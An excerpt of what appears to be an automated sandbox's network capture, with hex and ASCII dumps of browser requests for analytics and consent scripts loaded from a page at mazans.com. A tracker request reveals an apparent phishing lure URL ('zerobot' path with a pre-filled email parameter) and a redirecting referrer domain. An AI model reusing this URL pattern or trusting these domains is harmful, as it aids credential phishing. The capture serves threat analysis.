                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: var i=this.clone(n);return i.alt&&delete i.alt,this.clone(t,i)};this.fireBeacon=function(n){for(var i,s,e=this.getClUrl(this.urlPrefix),t=this.combine(this.beaconParams,n),r=this.stringifyToRequest(t),f=this.removeTrailingAmp(e+r),o=["r","el2","ec2","ea2"
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:16 UTC2609INData Raw: 6f 6d 6d 5f 74 6f 74 61 6c 76 61 6c 75 65 22 29 3b 74 68 69 73 2e 6d 61 70 47 74 6d 55 61 73 50 72 6f 64 75 63 74 73 28 6e 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 75 61 5f 65 22 3a 74 68 69 73 2e 6d 61 70 47 74 6d 45 63 6f 6d 6d 65 72 63 65 50 75 72 63 68 61 73 65 28 6e 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 67 61 34 22 3a 74 68 69 73 2e 72 65 70 6c 61 63 65 47 74 6d 50 61 72 61 6d 28 6e 2c 22 76 61 6c 75 65 22 2c 22 65 76 65 6e 74 5f 76 61 6c 75 65 22 29 3b 74 68 69 73 2e 6d 61 70 47 74 6d 47 61 34 49 74 65 6d 73 28 6e 29 7d 72 65 74 75 72 6e 20 6e 7d 3b 76 61 72 20 74 3d 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3b 74 68 69 73 2e 64 6f 63 75 6d 65 6e 74 55 72 6c 43 68 61 6e 67 65 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: omm_totalvalue");this.mapGtmUasProducts(n);break;case"ua_e":this.mapGtmEcommercePurchase(n);break;case"ga4":this.replaceGtmParam(n,"value","event_value");this.mapGtmGa4Items(n)}return n};var t=window.location.href;this.documentUrlChanged=function(){var n=


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          63192.168.2.174986254.75.69.1924436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:15 UTC7786OUTGET /ct?id=72967&url=https%3A%2F%2Fmazans.com%2FWEB-ID-6672849687924%2Fzerobot%2F%3Femail%3DEMAIL_REDACTED&sf=0&tpi=&ch=SendGrid&uvid=&tsf=0&tsfmi=&tsfu=&cb=1731515352667&hl=1&op=0&ag=300509663&rand=53607585128791107956101156266160898169065292290902265118522000152187107289761818102920&fs=1280x907&fst=1280x907&np=win32&nv=google%20inc.&ref=https%3A%2F%2Fsepedatua.com%2F&ss=1280x1024&nc=0&at=&di=W1siZWYiLDM4ODhdLFsiYWJuY2giLDE3XSxbLTI0LCJbXSJdLFstMjgsImVuLVVTLGVuIl0sWy0zNCwiLSJdLFstNDYsIjAiXSxbLTQ4LCIwLDAiXSxbMTIsIntcImN0eFwiOlwid2ViZ2xcIixcInZcIjpcImdvb2dsZSBpbmMuIChnb29nbGUpXCIsXCJyXCI6XCJhbmdsZSAoZ29vZ2xlLCB2dWxrYW4gMS4zLjAgKHN3aWZ0c2hhZGVyIGRldmljZSAoc3ViemVybykgKDB4MDAwMGMwZGUpKSwgc3dpZnRzaGFkZXIgZHJpdmVyKVwiLFwic2x2XCI6XCJ3ZWJnbCBnbHNsIGVzIDEuMCAob3BlbmdsIGVzIGdsc2wgZXMgMS4wIGNocm9taXVtKVwiLFwiZ3ZlclwiOlwid2ViZ2wgMS4wIChvcGVuZ2wgZXMgMi4wIGNocm9taXVtKVwiLFwiZ3ZlblwiOlwid2Via2l0XCIsXCJiZW5cIjo3LFwid2dsXCI6MSxcImdyZW5cIjpcIndlYmtpdCB3ZWJnbFwiLFwic2VmXCI6MzY5ODUxODcxMCxcInNlY1wiOlwiXCJ9Il0sWy00LCItIl0sWy0zNSw [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                          Host: obseu.powerrobotflower.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://mazans.com/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:15 UTC437INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/javascript
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:15 GMT
                                                                                                                                                                                                                                                                                                                                                                          Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                          Set-Cookie: cg_uuid=a7672655cc19ce211243958c37046200; Max-Age=29030400; Path=/; Expires=Wed, 15 Oct 2025 16:29:15 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                          Timing-Allow-Origin: https://mazans.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:15 UTC742INData Raw: 64 39 34 0d 0a 74 79 70 65 6f 66 20 5f 5f 63 74 63 67 5f 63 74 5f 37 32 39 36 37 5f 65 78 65 63 20 3d 3d 3d 20 27 66 75 6e 63 74 69 6f 6e 27 20 26 26 20 5f 5f 63 74 63 67 5f 63 74 5f 37 32 39 36 37 5f 65 78 65 63 28 7b 22 74 63 22 3a 22 33 37 64 66 62 64 38 65 65 38 34 65 30 30 31 32 36 39 65 66 63 32 33 34 65 66 34 34 38 66 39 38 39 32 32 35 63 32 34 66 35 36 37 64 34 33 64 36 64 61 31 39 30 38 62 65 36 32 34 35 63 61 64 37 62 64 37 30 61 39 37 36 37 35 30 65 66 38 30 65 64 38 39 33 37 33 62 66 65 37 30 65 39 63 32 30 63 31 65 35 33 65 38 64 35 39 31 33 38 34 36 62 32 30 31 37 30 37 31 61 31 30 61 63 66 39 66 32 39 66 36 37 31 38 38 35 38 35 38 65 30 35 32 61 33 61 31 65 61 64 32 62 37 36 30 64 64 34 36 65 64 64 36 33 63 36 30 36 33 34 30 36 32 61 39 36
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: d94typeof __ctcg_ct_72967_exec === 'function' && __ctcg_ct_72967_exec({"tc":"37dfbd8ee84e001269efc234ef448f989225c24f567d43d6da1908be6245cad7bd70a976750ef80ed89373bfe70e9c20c1e53e8d5913846b2017071a10acf9f29f671885858e052a3a1ead2b760dd46edd63c60634062a96
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:15 UTC2358INData Raw: 65 36 35 39 36 62 33 34 30 62 62 34 31 34 66 30 37 64 66 35 61 35 33 38 37 64 34 63 65 64 30 63 36 65 63 38 38 33 30 63 35 33 63 39 64 63 33 62 32 38 37 37 62 65 35 37 32 32 34 31 33 61 62 35 62 30 30 62 61 61 39 61 31 36 39 30 31 66 33 63 39 34 35 38 63 32 37 61 37 64 64 30 64 39 30 37 30 65 66 32 35 31 31 30 35 31 34 64 63 33 31 62 63 31 63 64 31 63 62 65 65 32 37 65 62 64 35 36 61 39 36 34 65 61 39 63 66 64 64 39 62 33 66 63 65 36 65 37 35 32 64 62 33 31 65 31 34 31 33 32 36 31 61 33 30 38 37 62 62 36 30 66 34 31 64 38 32 38 32 63 37 33 34 61 32 39 61 36 32 65 64 38 30 32 62 63 61 63 32 62 31 62 65 37 37 39 39 61 36 66 35 34 65 33 65 33 33 63 35 66 38 35 39 35 36 64 63 62 31 30 61 34 63 31 35 66 37 61 30 65 33 33 39 66 39 32 35 38 38 66 36 34 65 62 63
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: e6596b340bb414f07df5a5387d4ced0c6ec8830c53c9dc3b2877be5722413ab5b00baa9a16901f3c9458c27a7dd0d9070ef25110514dc31bc1cd1cbee27ebd56a964ea9cfdd9b3fce6e752db31e1413261a3087bb60f41d8282c734a29a62ed802bcac2b1be7799a6f54e3e33c5f85956dcb10a4c15f7a0e339f92588f64ebc
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:15 UTC388INData Raw: 30 63 61 62 36 35 63 30 62 62 65 37 36 31 38 38 38 62 31 63 66 30 32 62 32 30 66 65 35 35 32 35 37 33 63 31 38 61 38 34 35 64 30 33 62 31 32 66 65 37 38 34 31 32 63 36 31 35 36 35 35 35 30 38 61 65 33 31 32 64 38 32 61 66 64 34 36 38 64 37 34 35 37 65 63 37 64 34 30 31 61 62 64 65 63 31 65 64 63 30 31 66 38 66 31 66 34 37 32 38 31 34 66 32 37 37 32 36 35 32 38 30 38 32 34 63 30 31 66 38 32 65 65 64 66 65 64 64 33 66 64 30 39 30 62 66 35 66 34 66 37 36 61 33 37 36 33 32 35 37 34 37 39 63 34 32 31 32 66 34 39 33 65 66 31 38 31 31 39 33 36 32 36 64 63 31 63 38 63 34 31 32 38 62 63 36 62 30 63 66 34 35 33 30 65 33 36 36 65 65 31 35 36 30 35 37 64 30 35 63 37 32 33 63 63 37 64 61 30 63 34 30 38 62 64 36 61 65 22 7d 2c 22 22 2c 7b 22 72 65 71 22 3a 22 37 62 39
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 0cab65c0bbe761888b1cf02b20fe552573c18a845d03b12fe78412c615655508ae312d82afd468d7457ec7d401abdec1edc01f8f1f472814f277265280824c01f82eedfedd3fd090bf5f4f76a3763257479c4212f493ef181193626dc1c8c4128bc6b0cf4530e366ee156057d05c723cc7da0c408bd6ae"},"",{"req":"7b9


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          64192.168.2.174987213.225.78.574436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:15 UTC766OUTGET /bannermsg?action=views&domain=sendgrid.com&behavior=implied&country=us&language=en&rand=0.21308546817366736&session=57cd44ce-3945-49f8-b363-1f9e5ecbe175&userType=NEW&referer=https://mazans.com HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: consent.trustarc.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://mazans.com/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:16 UTC540INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: image/gif
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 43
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:15 GMT
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                          Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                                                                                                                          Via: 1.1 e5b93012e2bfb81dc9846f43efd610a6.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                          X-Amz-Cf-Pop: FRA2-C2
                                                                                                                                                                                                                                                                                                                                                                          X-Amz-Cf-Id: NNnOAAMpy7SC8xpnA-gMD7wQz6wGR4cHn1r9ytORFe6BoKalGcawjA==
                                                                                                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:16 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 db df ef 00 00 00 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: GIF89a!,D;


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          65192.168.2.1749879150.171.27.104436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:15 UTC525OUTGET /p/action/5202129.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: bat.bing.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://mazans.com/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:15 UTC571INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: private,max-age=60
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 4092
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                                                                                          X-MSEdge-Ref: Ref A: 0CDE2F758D9C4C2282985BD83CC08520 Ref B: DFW311000103039 Ref C: 2024-11-13T16:29:15Z
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:14 GMT
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:15 UTC2564INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 63 2c 6b 2c 61 2c 62 2c 74 2c 65 29 20 7b 0a 20 20 20 20 76 61 72 20 63 73 20 3d 20 64 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 3b 0a 20 20 20 20 69 66 20 28 63 73 29 20 7b 0a 20 20 20 20 20 20 20 20 76 61 72 20 75 6f 20 3d 20 63 73 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 75 65 74 6f 27 29 3b 0a 20 20 20 20 20 20 20 20 69 66 20 28 75 6f 20 26 26 20 77 5b 75 6f 5d 20 26 26 20 74 79 70 65 6f 66 20 77 5b 75 6f 5d 2e 73 65 74 55 73 65 72 53 69 67 6e 61 6c 73 20 3d 3d 3d 20 27 66 75 6e 63 74 69 6f 6e 27 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 5b 75 6f 5d 2e 73 65 74 55 73 65 72 53 69 67 6e 61 6c 73 28 7b 27 65 61 27 3a 20 63 2c 20 27 6b 63 27 3a 20 6b 2c 20 27 61 74 27 3a 20 61 2c 20 27
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: (function(w,d,c,k,a,b,t,e) { var cs = d.currentScript; if (cs) { var uo = cs.getAttribute('data-ueto'); if (uo && w[uo] && typeof w[uo].setUserSignals === 'function') { w[uo].setUserSignals({'ea': c, 'kc': k, 'at': a, '
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:15 UTC1249INData Raw: 20 28 21 28 65 2e 64 61 74 61 2e 74 79 70 65 20 3d 3d 3d 20 27 49 4e 49 54 5f 43 4c 41 52 49 54 59 5f 45 56 45 4e 54 5f 53 45 54 55 50 27 20 7c 7c 20 65 2e 64 61 74 61 2e 74 79 70 65 20 3d 3d 3d 20 27 41 43 4b 5f 52 45 49 4e 49 54 5f 43 4c 41 52 49 54 59 5f 45 56 45 4e 54 5f 53 45 54 55 50 27 29 29 20 7b 20 72 65 74 75 72 6e 3b 20 7d 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2f 20 63 6c 61 72 69 74 79 20 70 69 63 6b 65 72 20 73 63 72 69 70 74 20 65 6c 65 6d 65 6e 74 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 63 70 20 3d 20 64 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 73 29 3b 20 63 70 2e 73 72 63 20 3d 20 27 68 74 74 70 73 3a 2f 2f 63 6c 61 72 69 74 79 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 65 76 65 6e 74 50 69 63 6b 65 72 2e 6a
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: (!(e.data.type === 'INIT_CLARITY_EVENT_SETUP' || e.data.type === 'ACK_REINIT_CLARITY_EVENT_SETUP')) { return; }; // clarity picker script element var cp = d.createElement(s); cp.src = 'https://clarity.microsoft.com/eventPicker.j
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:15 UTC279INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 65 73 74 2c 66 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 63 70 2c 66 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 6d 65 73 73 61 67 65 27 2c 20 65 76 65 6e 74 4c 69 73 74 65 6e 65 72 29 3b 0d 0a 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 6c 61 75 6e 63 68 45 76 65 6e 74 53 65 74 75 70 28 29 3b 0d 0a 7d 29 28 77 69 6e 64 6f 77 2c 20 64 6f 63 75 6d 65 6e 74 2c
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: } f.parentNode.insertBefore(est,f); }; f.parentNode.insertBefore(cp,f); w.removeEventListener('message', eventListener); }); } launchEventSetup();})(window, document,


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          66192.168.2.174987513.32.27.864436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:15 UTC366OUTGET /js/heap-1541905715.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: cdn.heapanalytics.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:16 UTC636INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 131451
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:14 GMT
                                                                                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                                                                                          X-Powered-By: Express
                                                                                                                                                                                                                                                                                                                                                                          ETag: W/"2017b-aWr0LHjb5R58Q2uCCAfRpyrcbZ0"
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=120
                                                                                                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                                                                                                          Via: 1.1 0a4e8f7c3d348e526848328c55dd452a.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                          X-Amz-Cf-Pop: FRA56-C2
                                                                                                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                          X-Amz-Cf-Id: coAVkMylUpJUI6pJh7qN2WN-ozhpWMBZbYieC9mM7WmEurbJjRU0IQ==
                                                                                                                                                                                                                                                                                                                                                                          Age: 1
                                                                                                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:16 UTC16384INData Raw: 2f 2f 40 70 72 65 73 65 72 76 65 20 76 34 2e 32 33 2e 34 2b 38 65 36 38 33 39 65 62 32 39 39 64 61 0a 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 72 28 6e 29 7b 69 66 28 74 5b 6e 5d 29 72 65 74 75 72 6e 20 74 5b 6e 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 69 3d 74 5b 6e 5d 3d 7b 69 3a 6e 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 65 5b 6e 5d 2e 63 61 6c 6c 28 69 2e 65 78 70 6f 72 74 73 2c 69 2c 69 2e 65 78 70 6f 72 74 73 2c 72 29 2c 69 2e 6c 3d 21 30 2c 69 2e 65 78 70 6f 72 74 73 7d 72 2e 6d 3d 65 2c 72 2e 63 3d 74 2c 72 2e 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 72 2e 6f 28 65 2c 74 29 7c 7c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: //@preserve v4.23.4+8e6839eb299da!function(e){var t={};function r(n){if(t[n])return t[n].exports;var i=t[n]={i:n,l:!1,exports:{}};return e[n].call(i.exports,i,i.exports,r),i.l=!0,i.exports}r.m=e,r.c=t,r.d=function(e,t,n){r.o(e,t)||Object.defineProperty(e
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:16 UTC16384INData Raw: 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 77 69 6e 64 6f 77 2c 72 3d 27 27 3b 69 66 28 74 2e 61 75 72 79 63 29 7b 76 61 72 20 6e 3d 74 2e 61 75 72 79 63 2e 67 65 74 53 65 73 73 69 6f 6e 4d 65 74 61 64 61 74 61 28 29 2c 69 3d 6e 2e 73 69 74 65 49 64 2c 6f 3d 6e 2e 73 65 73 73 69 6f 6e 49 64 2c 61 3d 6e 2e 73 61 6d 70 6c 65 64 2c 75 3d 6e 2e 69 73 4f 76 65 72 3b 69 66 28 61 26 26 21 75 29 7b 76 61 72 20 63 3d 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 22 22 2e 63 6f 6e 63 61 74 28 69 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6f 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 65 29 29 3b 72 3d 22 61 75 72 79 63 3a 22 2e 63 6f 6e 63 61 74 28 63 29 7d 7d 72 65 74 75 72 6e 20 72 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 27 27
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: =function(e){try{var t=window,r='';if(t.auryc){var n=t.auryc.getSessionMetadata(),i=n.siteId,o=n.sessionId,a=n.sampled,u=n.isOver;if(a&&!u){var c=encodeURIComponent("".concat(i,"/").concat(o,"/").concat(e));r="auryc:".concat(c)}}return r}catch(e){return''
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:16 UTC12004INData Raw: 6f 63 75 6d 65 6e 74 41 6c 69 61 73 3a 64 6f 63 75 6d 65 6e 74 2c 67 65 74 43 6f 6e 66 69 67 3a 6f 65 2c 72 65 63 6f 72 64 45 72 72 6f 72 3a 48 74 7d 29 2c 62 3d 72 28 33 32 29 2c 49 3d 72 28 31 34 29 2c 43 3d 72 28 31 31 29 2c 4f 3d 72 28 33 33 29 2e 77 72 61 70 70 65 72 28 7b 67 65 74 43 6f 6e 66 69 67 3a 6f 65 2c 72 65 63 6f 72 64 45 72 72 6f 72 3a 48 74 7d 29 2c 4e 3d 72 28 33 34 29 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 5f 2e 63 61 6e 55 73 65 43 6f 6e 73 6f 6c 65 28 29 26 26 28 50 3d 63 6f 6e 73 6f 6c 65 2e 74 61 62 6c 65 3f 63 6f 6e 73 6f 6c 65 2e 74 61 62 6c 65 3a 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 29 3b 76 61 72 20 6b 3d 49 2e 4c 6f 67 67 65 72 2e 62 75 69 6c 64 28 7b 6c 6f 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 27 5b 48
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: ocumentAlias:document,getConfig:oe,recordError:Ht}),b=r(32),I=r(14),C=r(11),O=r(33).wrapper({getConfig:oe,recordError:Ht}),N=r(34),P=function(){};_.canUseConsole()&&(P=console.table?console.table:console.log);var k=I.Logger.build({log:function(){var e='[H
